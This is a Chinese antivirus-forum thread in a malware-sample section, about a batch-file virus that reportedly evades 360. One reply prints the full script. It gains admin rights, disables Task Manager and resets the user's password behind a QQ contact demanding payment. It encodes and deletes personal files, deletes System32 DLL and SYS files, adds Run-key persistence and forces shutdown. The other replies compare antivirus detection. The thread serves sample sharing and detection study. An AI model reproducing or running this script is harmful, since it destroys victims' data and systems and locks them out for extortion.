楼主: 光墓啊
收起左侧

[病毒样本] bat病毒,过360了,扫描也过了

  [复制链接]
meaqua
发表于 2021-2-4 10:53:20 | 显示全部楼层
JuMin 发表于 2021-2-4 09:16
瑞星、天擎不报

我这里天擎解压就杀了
wwwab
发表于 2021-2-4 12:47:02 | 显示全部楼层
这是病毒exe生成的bat,解压密码threatbook

看了下,代码为:
  1. [url=home.php?mod=space&uid=500624]@Shift[/url] /0
  2. [url=home.php?mod=space&uid=331734]@echo[/url] off
  3. cd C:\Users\%username%\Desktop\
  4. if not exist warn1.vbs (goto vbs1)
  5. if exist warn1.vbs (goto vbs2)
  6. : vbs1
  7. echo msgbox "这是个病毒,如果是不小心点的,别再点了" >>warn1.vbs
  8. start warn1.vbs
  9. exit
  10. : vbs2
  11. echo msgbox "这是个病毒,说过了吧" >warn2.vbs
  12. echo msgbox "如果这真的是测试环境,欢迎您再次双击进行测试"  >>warn2.vbs
  13. goto startahead
  14. :wwaarrnn
  15. start warn2.vbs
  16. exit
  17. : startahead
  18. if not exist C:\Windows\tat.txt (goto create)
  19. if exist C:\Windows\tat.txt (goto hack)
  20. : create
  21. echo msgbox "这是最后一次警告!!!" >>警告.vbs
  22. start 警告.vbs
  23. echo come on!!! >>C:\Windows\tat.txt
  24. goto wwaarrnn
  25. exit
  26. :hack
  27. %1 start "" mshta vbscript:createobject("shell.application").shellexecute("""%~0""","::",,"runas",0)(window.close)&exit
  28. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001
  29. echo 这是个病毒,作者说过了吧
  30. choice /t 2 /d y /n >nul
  31. cls
  32. echo @echo off>>lock.bat
  33. echo net user %username% 5539661qpec >>lock.bat
  34. ehco net user guest /active :yes>>lock.bat
  35. echo net user 要密码加QQ3051200685 administrator /add>>lock.bat
  36. echo net localgroup administrators 要密码加QQ3051200685 /add >>lock.bat
  37. echo exit >>lock.bat
  38. start lock.bat
  39. cls
  40. echo 今天
  41. echo 是
  42. echo 多么美好的一天
  43. echo 所以
  44. echo 接受审判吧,你这狂妄之人
  45. choice /t 2 /d y /n >nul
  46. cls
  47. color a
  48. %1 start "" mshta vbscript:createobject("shell.application").shellexecute("""%~0""","::",,"runas",0)(window.close)&exit

  49. md %temp%\tmprun

  50. cd %SystemDrive%\

  51. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  52. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  53. cd %UserProFile%\

  54. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  55. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  56. cd %temp%\tmprun
  57. cd %UserProFile%\Desktop\

  58. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  59. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  60. cd %temp%\tmprun
  61. cd %UserProFile%\Downloads\

  62. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  63. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  64. cd %temp%\tmprun
  65. cd %UserProFile%\Favorites\

  66. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  67. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  68. cd %temp%\tmprun
  69. cd %UserProFile%\Searches\

  70. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  71. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  72. cd %temp%\tmprun
  73. cd %UserProFile%\Saved Games\

  74. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  75. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  76. cd %temp%\tmprun
  77. cd %UserProFile%\Contacts\

  78. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  79. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  80. cd %temp%\tmprun
  81. cd %UserProFile%\Links\

  82. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  83. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  84. cd %temp%\tmprun
  85. cd %UserProFile%\Videos\

  86. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  87. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  88. cd %temp%\tmprun
  89. cd %UserProFile%\Pictures\

  90. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  91. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  92. cd %temp%\tmprun
  93. cd %UserProFile%\Documents\

  94. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  95. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  96. cd %temp%\tmprun
  97. cd %UserProFile%\Music\

  98. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  99. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"

  100. cd %SystemDrive%\

  101. del /s /q *.光墓data
  102. taskkill /f /im explorer.exe
  103. cd C:\Users\%username%\Desktop\
  104. for /l %%i  in (1, 1, 100)  do md  b%%i
  105. for /l %%i in (1, 1, 100) do copy %0 b%%i
  106. for /l %%i in (1, 1, 100) do for /l %%q in (1,1,100) do echo 1 >b%%i\第%%q个无法删除的文件.txt
  107. for /l %%i in (1, 1, 100) do echo do >>b%%i\提示%%i.vbs
  108. for /l %%i in (1, 1, 100) do echo msgbox "这是你的第%%i个文件夹",16,"病毒提示" >>b%%i\提示%%i.vbs
  109. for /l %%i in (1, 1, 100) do echo loop >>b%%i\提示%%i.vbs
  110. for /l %%i in (1, 1, 100) do move *.光墓是你爸 b%%i\
  111. for /l %%i in (1, 1, 100) do if exist "b%%i\提示%%i.vbs" (
  112. start b%%i\提示%%i.vbs  )
  113. for /l %%i in (1, 1, 100) do attrib +s +h "C:\Users\Administrator\Desktop\b%%i"
  114. taskkill /f /im wscript.exe
  115. md 加密
  116. for /l %%i in (1, 1, 100) do echo msgbox "我们隐藏了第%%i个文件夹"  >>加密\加密%%i.vbs
  117. for /l %%i in (1, 1, 100) do start 加密\加密%%i.vbs
  118. attrib +s +h "C:\Users\Administrator\Desktop\加密"
  119. taskkill /f /im wscript.exe

  120. copy %0 C:\Windows\System32\lock.bat
  121. echo del *.* /s /q tree>>de.bat
  122. start de.bat
  123. echo taskkill /f /im explorer.exe >>bili.bat
  124. echo taskkill /f /im wininit.exe >>bili.bat
  125. echo shutdown
  126. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v winstat /t reg_sz /d C:\Users\%username%\Desktop\bili.bat
  127. attrib +s +h C:\Users\%username%\Desktop\bili.bat
  128. del lock.bat
  129. echo del C:\Windows\System32\*.dll>>e.bat
  130. echo del e.bat >>e.bat
  131. start e.bat
  132. echo del C:\Windows\System32\*.sys>>f.bat
  133. echo del f.bat >>f.bat
  134. start f.bat
  135. echo nuiehewio>>11.vbs
  136. echo oueif89y32983>>11.vbs
  137. echo do>>equ.vbs
  138. echo msgbox ("DE DEUHOU")>>equ.vbs
  139. echo loop >>equ.vbs
  140. echo :a >>sta.bat
  141. echo start equ.vbs >>sta.bat
  142. echo goto a >>sta.bat
  143. start sta.bat
  144. echo shutdown /s /t 2 /c "You are FUCKED!!!">>down.bat
  145. start notepad.exe
  146. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v winrar /t reg_sz /d C:\Users\%username%\Desktop\down.bat
  147. start notepad.exe
  148. TASKKILL /F /IM WSCRIPT.EXE
  149. shutdown /s /t 5 /c "Bye~Bye"
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
BitterLotus
发表于 2021-2-4 12:56:25 | 显示全部楼层
wwwab 发表于 2021-2-4 12:47
这是病毒exe生成的bat,解压密码threatbook

看了下,代码为:

代码简陋但又生动
测试者
头像被屏蔽
发表于 2021-2-4 14:00:57 | 显示全部楼层
wwwab 发表于 2021-2-4 12:47
这是病毒exe生成的bat,解压密码threatbook

看了下,代码为:

哇,你这行为可以啊。
kbsj123321
发表于 2021-2-4 14:52:48 | 显示全部楼层
诺顿

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
henry217
发表于 2021-2-4 15:58:41 | 显示全部楼层
现在报了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Domenic
发表于 2021-2-4 16:31:02 | 显示全部楼层

这是病毒发作了?
话说回滚一般都挺卡的吧......
Domenic
发表于 2021-2-4 16:48:05 | 显示全部楼层

你用国外版的卡巴啊,应该中国的病毒识别比较少吧
温馨小屋
头像被屏蔽
发表于 2021-2-4 16:53:06 | 显示全部楼层
Domenic 发表于 2021-2-4 16:31
这是病毒发作了?
话说回滚一般都挺卡的吧......

因为它释放了一大堆一样的vbs,和回滚没有关系
光墓啊
 楼主| 发表于 2021-2-4 18:59:18 | 显示全部楼层
测试者 发表于 2021-2-4 14:00
哇,你这行为可以啊。

我,,,这。。。闲的
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-19 20:15 , Processed in 0.099248 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表